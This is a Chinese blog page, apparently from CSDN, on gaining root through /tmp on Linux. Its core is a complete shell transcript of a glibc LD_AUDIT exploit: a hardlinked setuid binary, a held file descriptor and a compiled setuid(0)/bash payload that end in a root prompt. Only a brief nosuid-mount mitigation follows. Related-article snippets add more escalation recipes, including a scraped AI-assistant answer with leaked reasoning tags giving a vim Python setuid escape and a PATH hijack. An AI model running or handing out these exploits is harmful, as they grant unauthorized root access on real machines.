linux 利用tmp提权

最新推荐文章于 2024-06-17 19:18:53 发布
最新推荐文章于 2024-06-17 19:18:53 发布 · 382 阅读 · 0

以一个普通用户登录
[hello@localhost tmp]$ ls -ld /tmp/ 因为tmp目录能写文件!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[hello@localhost tmp]$ cd /tmp/
[hello@localhost tmp]$ mkdir exploit
[hello@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[hello@localhost tmp]$ exec 3< /tmp/exploit/target 文件描述符,把/tmp/exploit/target定义为文件描述符3
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$ rm -fr /tmp/exploit/
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$ cat > payload.c 高级系统管理员必须要把c学的很明白!!
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[hello@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[hello@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[hello@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 定义环境变量
[root@localhost tmp]# whoami
root


--------------
http://marc.info/?l=full-disclosure&m=128739684614072&w=2
-
一般不开777权限目录的. 如果要则
对777的目录做如下操作,可以控制你提权的.比如/tmp
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp nosuid 不允许执行suid权限


iteye_21199
关注
Shell脚本学习-阶段二十七-命令解释一
qq_43058317的博客
06-16 4620
文章目录-命令解释一前言asexprgccgcovgdbindentldldconfiglddmakemktempnmobjdumpperlphpprotoizeunprotoizereadelftestawkbccal=cksum=md5sum=sumclear=suspend=reset=consoletypedate=dircolorsgpmhostidinfo=man=mesgwallwritemtoolsmtoolstestrsync=sleepsttytalktempfilevdfusewh..
升:利用Linux错配
qq_68163788的博客
02-14 1868
Linux系统中,错误的配置可能导致漏洞,使攻击者能够获取比其本来限更高的限。这种错误配置可能涉及文件限、用户组设置、sudo配置等。 一种常见的错误配置漏洞是在文件限设置上。如果系统中的某个文件被设置为具有过高的限,例如普通用户可以执行的文件被设置为具有root限,攻击者可以利用这个漏洞来执行恶意代码并获取更高的限。 另一种错误配置漏洞是在用户组设置上。如果某个用户组被错误地配置为具有root限,攻击者可以将自己添加到这个用户组中,从而获取更高的限。
linux tmp限,linux 利用tmp
weixin_36178269的博客
04-29 1213
以一个普通用户登录[hello@localhost tmp]$ ls -ld /tmp/ 因为tmp目录能写文件!!drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/[hello@localhost tmp]$ cd /tmp/[hello@localhost tmp]$ mkdir exploit[hello@localhost tmp]$ ln /...
Linux
weixin_60567444的博客
05-14 1266
1.SUID限只能设置二进制文件2.命令执行者要有二进制的执行限3.命令执行者执行二进制文件时会获得该程序的属主身份4.SUID限只在程序执行的过程中有效即如果root给一个程序赋予了suid限,则普通用户在执行的过程中是root限可以通过find / -perm -u=s -type f 2>/dev/null 命令来查找带有SUID限的文件perm-指定的限 -u=s代表SUID限 type指定文件的类型 f-可以理解为可执行文件以cp为列子:在root下找到cp并且给它加SUID的
精选资源
Linux姿势二:利用NFS
09-01
Linux 姿势二:利用 NFS Linux 姿势二:利用 NFS 是指在 Linux 系统中,利用 NFS(Network File System)共享来升级特的一种方法。当我们拥有低特的 shell 并且发现服务器中具有 NFS 共享时,...
linux——大赏
qq_55202378的博客
04-20 1792
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现;时本来就是root限,预先加载共享库shell.so时,也是以root用户的限去加载的。
dirtycow脏牛linuxexp
03-25
这个漏洞利用Linux内核中的一个内存管理错误,允许本地非特用户获取root限,进行升,因此在网络安全领域中被称为“脏牛”漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
linux计划任务
2401_83659708的博客
06-17 949
发现有 chkrootkit 软件的脚本(rootkit 是黑客用来入侵的工具,chkrootkit是用来检查 rootkit 是否存在的)发现支持 PUT 方法,利用 PUT 文件上传。-- snip -- 假如不是弱口令游戏继续。history -r #删除当前会话历史记录。获得版本信息可以网上搜索看是否存在公开漏洞。msf 成功上线拿到普通用户。
Linux 升--SUID
u012967763的专栏
01-09 3926
1、SUID 通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的限。由于SUID和SGID是在执行程序(程序的可执行位被设置)时起作用,而可执行位只对普通文件和目录文件有意义,所以设置其他种类文件的SUID和SGID位是没有多大意义的。一个文件设置了SUID那么该文件的属性中有s标志,如下所示。 [root@VM_0_11_centos ~]# chmod u+...
c语言,利用tmp目录限、suid 限和C语言使普通帐号为ROOT
weixin_35715366的博客
05-19 580
利用tmp目录限、suid 限和C语言使普通帐号为ROOT限RHEL5-RHEL6下面都可以实现,root的UID是零创建一个普通用户useradd andy切换到andy用户su - andy查看当前用户是谁whoami查看tmp目录限[andy@bogon tmp]$ ll -d /tmpdrwxrwxrwt. 15 root root 4096 6月 29 14:08 /...
Linux
qq_46527080的博客
02-25 1000
Linux1.脏牛漏洞2.sudo-- CVE-2019-142873.Linux配置错误4.内核2.6本地5.suid 1.脏牛漏洞 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) exp: https://github.com/gbonacini/CVE-2016-5195 https://github.com/FireFart/dirtycow 实验环境是在bee-bug靶场中进行 首先我们进入这个bee-bug靶场 然
一个linux用的技巧
魔拉宝
09-16 497
 一个linux用的技巧,放出来攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本一个test:[xiaoyu@localdomain ~]$ echo $BASH_ENV[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"[x
linux粘滞位限,Linux中的特殊限粘滞位(sticky bit)详解
weixin_27153203的博客
04-29 451
Linux下的文件限在linux下每一个文件和目录都有自己的访问限,访问限确定了用户能否访问文件或者目录和怎样进行访问。最为我们熟知的一个文件或目录可能拥有三种限,分别是读、写、和执行操作,在这里不做详细说明。我们创建一个文件后系统会默认地赋予所有者读和写限。当然我们也可以自己修改它,添加自己需要的限。特殊限但是这三种限就足够了吗?我们现在来说说在linux下的另一个特殊限。首先...
Linux利用SUID
Ms08067安全实验室
03-16 3246
今天给大家带来的是linux下的技巧。SUID是Linux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥...
超全的 Linux 机器的渗透测试命令备忘表 原创 2018-01-19 OSC - 协作翻译 开源中国 协作翻译 原文:Most Important Penetration Testing co
鲍鱼哥的博客
01-19 843
超全的 Linux 机器的渗透测试命令备忘表原文:Most Important Penetration Testing commands Cheat Sheet for Linux Machine链接:https://techincidents.com/important-penetration-testing-cheat-sheet/如下是一份 Linux 机器的渗透测试备忘录,是在后期开发期间
Linux基本防护 、 用户切换与 、 SSH访问控制
爱死亡机器人
11-16 3048
ONEDAY 物理安全:主机,机房环境 系统安全:操作系统用户管理磁盘挂载susudo文件设置特殊属性 应用安全:网络服务与应用程序只允许管理员root有限、设置进程的执行者是普通用户 网络安全:防火墙(硬件防火墙和软件防火墙)rhel7(firewalld)rhel6(iptables) 防
kali命令大全
热门推荐
东方佑
11-29 19万+
arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示CPU info的信息 c...
linux命令
最新发布
10-29
<think>首先,用户的问题是:“我想查找在Linux系统中进行操作的命令 请问Linux系统命令”。用户之前供了几个引用,我需要参考这些引用来回答。 回顾引用内容: - 引用[1]:到使用 `find / -perm -u=s -type f 2>/dev/null` 或 `find / -user root -perm -4000 -print 2>/dev/null` 来查找SUID的可执行文件。 - 引用[2]:展示了如何使用Vim:`./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'`。 - 引用[3]:描述劫持环境变量进行:创建文件 `cat` 内容为 `/bin/bash`,然后修改限 `chmod 777 cat`,再设置环境变量 `export PATH=/tmp:$PATH`。 - 引用[4]:是渗透测试中的命令序列,但内容不具体,只到创建用户和。 用户需求是查找Linux系统命令。操作通常指从普通用户升到root限,这在安全测试或渗透测试中常见。 我的回答需要: - 使用中文。 - 结构清晰,帮助用户逐步解决问题。 - 确保真实可靠(基于标准Linux安全知识)。 - 参考供的引用。 - 在引用的段落末尾自然地添加引用标识,如[^1]。 - 最后生成相关问题(根据系统指令)。 回答结构: 1. **介绍概念**:简要解释Linux是什么。 2. **常见命令和方法**:基于引用,列出几个常见的技术。 - SUID:使用find命令查找SUID文件。 - 漏洞利用:如使用Vim或其他程序的漏洞。 - 环境变量劫持。 - 其他方法如内核漏洞或sudo(引用中未直接到,但要确保真实)。 3. **注意事项**:醒用户操作可能违法或不道德,仅用于学习或授测试。 4. **总结**:强调安全性和合法性。 5. **生成相关问题**:在最后添加§§相关问题§§部分。 参考引用: - 在描述SUID时:引用[1]。 - 在Vim时:引用[2]。 - 在环境变量劫持时:引用[3]。 - 引用[4]内容模糊,可能不直接相关,但到创建用户和,我可以忽略或简要及。 确保回答真实可靠:命令是基于Linux安全机制,如SUID、PATH变量等风险点。 最终回答大纲: - 开头简述。 - 列出几个具体命令: 1. SUID命令。 2. Vim命令。 3. 环境变量劫持命令。 4. 其他常用方法(如sudo)。 - 结束时添加相关问题。 生成相关问题: - 类似示例,例如: 1. 如何防止SUID漏洞? 2. 常见的工具有哪些? 3. 操作有哪些法律风险? </think>### Linux系统命令总结 在Linux系统中,(Privilege Escalation)指从普通用户升到root限的操作,通常用于安全测试或渗透测试场景。以下基于引用内容,整理常见命令和方法,内容真实可靠,但需注意:**操作仅在授环境中使用,否则违法且违反安全规范**。 #### 1. **SUID命令** SUID(Set User ID)文件允许普通用户以root限执行。查找此类文件是的常见起点: ```bash find / -perm -u=s -type f 2>/dev/null # 搜索所有SUID文件并忽略错误输出[^1] ``` 或更精确的版本: ```bash find / -user root -perm -4000 -print 2>/dev/null # 查找属主为root且限为4000的文件[^1] ``` - **示例攻击**:如果找到`/usr/bin/vim`(或类似程序),利用(见下文)。 #### 2. **利用程序漏洞** 某些程序存在漏洞,可直接执行命令: - **Vim**(需Vim支持Python): ```bash ./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' # 调用Vim执行Python代码获取root shell[^2] ``` - **其他常见工具**:如`nmap`、`find`等,可通过类似方法(如`--exec`参数)执行恶意命令。 #### 3. **环境变量劫持** 通过修改PATH变量,劫持系统命令: ```bash cd /tmp echo "/bin/bash" > cat # 创建恶意文件cat,内容为/bin/bash chmod 777 cat # 赋予执行限 export PATH=/tmp:$PATH # 将/tmp添加到PATH首位,优先执行恶意文件[^3] ``` - **攻击效果**:当系统调用`cat`命令时会执行恶意脚本,获取root shell(前是目标程序以root限运行)。 #### 4. **其他常用方法** - **sudo**:如果用户有sudo限,直接执行: ```bash sudo su # 切换为root用户 ``` - **内核漏洞利用**:使用公开的exp(如Dirty COW): ```bash ./exploit_cve-2016-5195 # 运行内核漏洞利用脚本 ``` - **添加用户并**(引用[4]示例): ```bash useradd admin && passwd admin # 创建新用户 usermod -aG sudo admin # 将用户加入sudo组[^4] ``` #### 注意事项 - **合法性**:操作必须在授渗透测试中进行,避免非法入侵。 - **防御建议**:定期审计SUID文件(`find / -perm -4000`),限制sudo限,及时修补漏洞。 - **风险示**:不当使用可能导致系统崩溃或法律责任[^1][^2][^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值